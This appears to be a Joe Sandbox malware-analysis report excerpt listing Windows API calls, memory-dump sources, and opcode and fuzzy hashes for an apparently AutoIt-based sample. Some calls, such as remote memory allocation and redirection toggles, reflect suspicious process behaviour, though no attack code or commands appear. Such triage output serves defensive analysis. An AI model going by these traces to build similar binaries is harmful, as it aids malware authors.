                                                    • Part of subcall function 00C513DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C4925A,00000034,?,?,00001004,00000000,00000000), ref: 00C5142F
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C498AC
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C498F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 67367ce4927a3964409857b8b03f790f6b702ffa8e5334164e90eb7389592d3a
                                                  • Instruction ID: e5f11b16bed77358d1309277ffeec0b58534c66bbcdda8ef4f1a95c88aef0ccc
                                                  • Opcode Fuzzy Hash: 67367ce4927a3964409857b8b03f790f6b702ffa8e5334164e90eb7389592d3a
                                                  • Instruction Fuzzy Hash: B4413C7690021CBEDB10DFA4CC85BDEBBB8EB09700F044199FA55B7191DA716E89DBA0
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C7F910,00000000,?,?,?,?), ref: 00C779DF
                                                  • GetWindowLongW.USER32 ref: 00C779FC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C77A0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 93ae13da18a087b2bc086de3824d1e8ce34002aa6ba0989d7bbd0ef8aa2f206a
                                                  • Instruction ID: 80a006d0df4784062d62d424234d2bed0340bc6681073be454e12218d0535471
                                                  • Opcode Fuzzy Hash: 93ae13da18a087b2bc086de3824d1e8ce34002aa6ba0989d7bbd0ef8aa2f206a
                                                  • Instruction Fuzzy Hash: 4D31B03120520AAFDB118F38DC41BEA77A9EB45334F208725F979A32E0D731EE519B50
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C77461
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C77475
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C77499
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 17f077bd6a55cf1a59e0f90b0f1d546796bfa22ed3837d8ff9cc4355201916d3
                                                  • Instruction ID: 00fcebc75a35cef956b952bc71ffcf43b1d2391256489fb2e99762751a5ed416
                                                  • Opcode Fuzzy Hash: 17f077bd6a55cf1a59e0f90b0f1d546796bfa22ed3837d8ff9cc4355201916d3
                                                  • Instruction Fuzzy Hash: 19219F3260021DABDF118EA4CC46FEA3B79EF48724F114254FE196B190DA75AC95DBA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C77C4A
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C77C58
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C77C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: f5752aa199930d18c94f9094d589cbb6ec861d5c55ec51879af10a3f613428d4
                                                  • Instruction ID: 0fac4b9f5fbdc64bb9c1ac59673e1b0860d9a9f0ee1dc61cf11343dcfc75766b
                                                  • Opcode Fuzzy Hash: f5752aa199930d18c94f9094d589cbb6ec861d5c55ec51879af10a3f613428d4
                                                  • Instruction Fuzzy Hash: FD218EB5604208AFDB11DF28DCC1EAA37ECEF4A354B144559FA199B3A1CB32EC518A60
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C76D3B
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C76D4B
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C76D70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 70a0e333e516c25f86569d2c0e144efa313ef9225bcd6d322fa6b4e520a500e6
                                                  • Instruction ID: 02bbf94eb4f875ddda271a1be33f14883939d89385fc97ea5230d93550cead50
                                                  • Opcode Fuzzy Hash: 70a0e333e516c25f86569d2c0e144efa313ef9225bcd6d322fa6b4e520a500e6
                                                  • Instruction Fuzzy Hash: 83219532610118BFDF228F54CC45FBB37BAEF89754F11C128F9599B1A0C6719C519BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C77772
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C77787
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C77794
                                                  Strings
                                                   Memory Dump Source
                                                   • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                   Joe Sandbox IDA Plugin
                                                   • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 2766b096f966807a39e0600c1d28bb105e3b6b564d4c9d1abeb3bb3bc0f5970c
                                                  • Instruction ID: 89c50c871d7213f1812ef78a54223658bac86c9c87b748938c15ca2a0e079c88
                                                  • Opcode Fuzzy Hash: 2766b096f966807a39e0600c1d28bb105e3b6b564d4c9d1abeb3bb3bc0f5970c
                                                  • Instruction Fuzzy Hash: 8C11273220020CBFEF255F65CC01FEB37A8EF88B54F018628F655A6090C671E811CB20
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BF4B83,?), ref: 00BF4C44
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF4C56
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 3299905d89053558361366904747373e113909cc23e62fb1cb524ddc41b02328
                                                  • Instruction ID: f9febc5b79a91d083ece6add743690d1d96e87f8e4a8fe8e7226f31a2b224741
                                                  • Opcode Fuzzy Hash: 3299905d89053558361366904747373e113909cc23e62fb1cb524ddc41b02328
                                                  • Instruction Fuzzy Hash: BBD0E231910713CFD7209B31D98871A76E5EF05391B51D87ED59AD6160EB70D880CA50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BF4BD0,?,00BF4DEF,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4C11
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF4C23
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 259cf8a3d3c757940cdc81dfc23905d928449d309966da1c4378676e736c2479
                                                  • Instruction ID: b9abe626495882d0bbe18348dcfe20c406d17dd0db888f9a6a88853371d32be8
                                                  • Opcode Fuzzy Hash: 259cf8a3d3c757940cdc81dfc23905d928449d309966da1c4378676e736c2479
                                                  • Instruction Fuzzy Hash: 99D08230900713CFC720AB74C88830BBAE5EF09382B00C83ED58AC2560E7B0C881CA10
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00C71039), ref: 00C70DF5
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C70E07
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 642a1ae615c503f86f3fd405fa365428b58b42fd25a7832722969f51f455c927
                                                  • Instruction ID: a1e918b5e14fe3c3355013a796afebb5a0adad9fa7c514ffbf0472b6b1d34309
                                                  • Opcode Fuzzy Hash: 642a1ae615c503f86f3fd405fa365428b58b42fd25a7832722969f51f455c927
                                                  • Instruction Fuzzy Hash: 4CD0C730800323CFC3208F70C84A38AB6E4AF02382F20CC3E94DAC6150E6B0D8D0CB00
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C68CF4,?,00C7F910), ref: 00C690EE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C69100
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 50767fc9921b6e43f3adb3bdc98e4f89c55900c49e0c8313c8338db8f5b5ad1d
                                                  • Instruction ID: dd890cc3406589752c81f8bb6f6fb765cdfb7773a432089b325d99d879ffec14
                                                  • Opcode Fuzzy Hash: 50767fc9921b6e43f3adb3bdc98e4f89c55900c49e0c8313c8338db8f5b5ad1d
                                                  • Instruction Fuzzy Hash: 50D01735510713CFDB209F71D8A870E76E8AF06395F22C83E949AD6590EA70C8C0CA90
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  • Opcode ID: d3173d8d455b0741abcb1c600d02692d4a288eb88248727e0ff8ac679ebb04eb
                                                  • Instruction ID: e4691a1fd4801a3b275fe91d80d4d08938964af89d2ad1fe9e3466cd14f8018a
                                                  • Opcode Fuzzy Hash: d3173d8d455b0741abcb1c600d02692d4a288eb88248727e0ff8ac679ebb04eb
                                                  • Instruction Fuzzy Hash: 79D0177182810DFECB009A9298899FD77BCBB0A301F1C04A2B906E3040E6328B94EA21
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76c964cc1b0bb5b7ac1495c5466d39f7950e6f8f75ca1d69070b9a25078dfef4
                                                  • Instruction ID: 1392b4e3104a1255364feba84833bfe411ad06248ea536ce6121b60abe59c700
                                                  • Opcode Fuzzy Hash: 76c964cc1b0bb5b7ac1495c5466d39f7950e6f8f75ca1d69070b9a25078dfef4
                                                  • Instruction Fuzzy Hash: 84C17175A04216EFCB14CFA4C884EAEBBB5FF48714B158698F815EB251D730EE81DB90
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C6E0BE
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C6E101
                                                    • Part of subcall function 00C6D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6D7C5
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C6E301
                                                  • _memmove.LIBCMT ref: 00C6E314
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 5c4227a37962bb8018c5a43351cb41005ba009bde2d4201653c57a9341124835
                                                  • Instruction ID: abba8aa292f02b59264b6e1094cc8303bfa658b7a59879a1c3bd5122ae45050c
                                                  • Opcode Fuzzy Hash: 5c4227a37962bb8018c5a43351cb41005ba009bde2d4201653c57a9341124835
                                                  • Instruction Fuzzy Hash: 0BC188756083018FC724DF28C480A6ABBE4FF89314F14896EF9999B351D770EA46CF82
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C680C3
                                                  • CoUninitialize.OLE32 ref: 00C680CE
                                                    • Part of subcall function 00C4D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4D5D4
                                                  • VariantInit.OLEAUT32(?), ref: 00C680D9
                                                  • VariantClear.OLEAUT32(?), ref: 00C683AA
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: a8612e601a483fe2a9c253133a56d44862809d7285277932f01c5bc9cea9230b
                                                  • Instruction ID: 198ffdb651e043add7fd84efcba14cf5b9fa808a89414422c55bd03c42c9b2df
                                                  • Opcode Fuzzy Hash: a8612e601a483fe2a9c253133a56d44862809d7285277932f01c5bc9cea9230b
                                                  • Instruction Fuzzy Hash: 3AA169752047059FCB20DF25C491B2AB7E4BF89394F144558FA9A9B3A2CB30ED49CB82
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C82C7C,?), ref: 00C476EA
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C82C7C,?), ref: 00C47702
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00C7FB80,000000FF,?,00000000,00000800,00000000,?,00C82C7C,?), ref: 00C47727
                                                  • _memcmp.LIBCMT ref: 00C47748
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: 4cbc848618c333f000b43efbe0daaf8d91e78acbb04c69df4e2f80a90c9dbbe0
                                                  • Instruction ID: 426f120d3440d33d9ba083c6ead96a7ad92eb1f6f9704a1519c08a302bd42740
                                                  • Opcode Fuzzy Hash: 4cbc848618c333f000b43efbe0daaf8d91e78acbb04c69df4e2f80a90c9dbbe0
                                                  • Instruction Fuzzy Hash: 58811B75A00109EFCB04DFA4C988EEEB7B9FF89315F204598F515AB250DB71AE46CB60
                                                  APIs
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: 47f849e2a51d339e620dcf52e2554e2622947606fc6fcfa2df4f6256862d9136
                                                  • Instruction ID: 45512eb45dd2801aebce2937bda15931f5d5b44183230aef6081944c43ae955d
                                                  • Opcode Fuzzy Hash: 47f849e2a51d339e620dcf52e2554e2622947606fc6fcfa2df4f6256862d9136
                                                  • Instruction Fuzzy Hash: 6851C3747007019ADB24EF66D891B7EB3E5BF46310F20C81FE996EB295DB70D884A712
                                                  APIs
                                                    • Part of subcall function 00BF4EE5: _fseek.LIBCMT ref: 00BF4EFD
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59824
                                                    • Part of subcall function 00C59734: _wcscmp.LIBCMT ref: 00C59837
                                                  • _free.LIBCMT ref: 00C596A2
                                                  • _free.LIBCMT ref: 00C596A9
                                                  • _free.LIBCMT ref: 00C59714
                                                    • Part of subcall function 00C12D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C19A24), ref: 00C12D69
                                                    • Part of subcall function 00C12D55: GetLastError.KERNEL32(00000000,?,00C19A24), ref: 00C12D7B
                                                  • _free.LIBCMT ref: 00C5971C
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: 01e3ebb05d9156fe44a358a96b6ac6595ad6e39d2e799081a3dabc5bfc0fa677
                                                  • Instruction ID: 6ecd0f7f9bfa4d86954c03dd593281c36173377defb692570e2c8527ca184f6f
                                                  • Opcode Fuzzy Hash: 01e3ebb05d9156fe44a358a96b6ac6595ad6e39d2e799081a3dabc5bfc0fa677
                                                  • Instruction Fuzzy Hash: 3D514BB5904218EBDF249F64DC81AAEBBB9EF48300F1004DEF609A3241DB715A94DF58
                                                  APIs
                                                  • GetWindowRect.USER32(0156E480,?), ref: 00C79863
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00C79896
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C79903
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: e2b666eb112d36b62264a7b1fcd4dd35b273d2818278954bea839cbb2bcc5648
                                                  • Instruction ID: 46f4a81dc8267270b322154f2db76ff3558b7bef85eb1a58dc7d24d788aa0d31
                                                  • Opcode Fuzzy Hash: e2b666eb112d36b62264a7b1fcd4dd35b273d2818278954bea839cbb2bcc5648
                                                  • Instruction Fuzzy Hash: 6B512E34A00209AFDF14DF64D884AAE7BB5FF45360F14825DF9699B2A0D731AE81CB91
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C49AD2
                                                  • __itow.LIBCMT ref: 00C49B03
                                                    • Part of subcall function 00C49D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C49DBE
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C49B6C
                                                  • __itow.LIBCMT ref: 00C49BC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: 9623b5ee669fa54ef24964db59147f33d701ee33885af85916f49de018bc6f66
                                                  • Instruction ID: 8c3aeea46ab842c3f279c8e30d06ccbba3e9b951f70054f0b6ef89cacb354cfb
                                                  • Opcode Fuzzy Hash: 9623b5ee669fa54ef24964db59147f33d701ee33885af85916f49de018bc6f66
                                                  • Instruction Fuzzy Hash: BE417F70A0021CABDF21EF64D845BFE7BB9EF45724F0000A9FA15A7291DB709A49CB61
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00C669D1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C669E1
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C66A45
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C66A51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: 237456479aebf8b06e60506ed84cf02667d7db0a1cb6305df82eb9a3b4523203
                                                  • Instruction ID: bb505a762fa202d46bd1affea08e1505981f02c9b9b9a8bb8f3ae6e525028f2e
                                                  • Opcode Fuzzy Hash: 237456479aebf8b06e60506ed84cf02667d7db0a1cb6305df82eb9a3b4523203
                                                  • Instruction Fuzzy Hash: C34181756402046FEB60AF64CC86F3A77E49F05B54F0484ACFA69AB2D3DB709D058B91
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C7F910), ref: 00C664A7
                                                  • _strlen.LIBCMT ref: 00C664D9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 9d9fd5f557c44d4e6782543fc9f00c44ad324fe0b7b21d7911e5c72fd77e5726
                                                  • Instruction ID: e153c7b10f8c9088ef13f3c94038ac852897355719d93295c7e563a1c9b6eb54
                                                  • Opcode Fuzzy Hash: 9d9fd5f557c44d4e6782543fc9f00c44ad324fe0b7b21d7911e5c72fd77e5726
                                                  • Instruction Fuzzy Hash: E141A731600108AFCB24EBA8DCD6FBEB7E9AF05314F148159F91A972D2DB30AE45DB51
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C5B89E
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00C5B8C4
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C5B8E9
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C5B915
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: d6e720ce5c1cb59d74802ad4df06c58cb030723886092522b2d0bdeb65a90633
                                                  • Instruction ID: f79ec20d661901c63ac587545161bc5ad2d7c8306713bd0b6f9eb22fd2937d0f
                                                  • Opcode Fuzzy Hash: d6e720ce5c1cb59d74802ad4df06c58cb030723886092522b2d0bdeb65a90633
                                                  • Instruction Fuzzy Hash: 15411839600614DFCB10EF15C484B6DBBE1AF4A390F098098ED5A9B362CB30FD49DB95
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C788DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 03df7cbceaf733c2c11e0736a99bc4327d33ef84f0465776af95511fa50ff9da
                                                  • Instruction ID: abf1a8c6b7698751678e3d300bc7168c423aec80e358f473ddb81f49db1ef0df
                                                  • Opcode Fuzzy Hash: 03df7cbceaf733c2c11e0736a99bc4327d33ef84f0465776af95511fa50ff9da
                                                  • Instruction Fuzzy Hash: E131C334680109BEEF219A69CC8DBBC77A5EB05350F94C111FB2DE61E1CE71DA489753
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00C7AB60
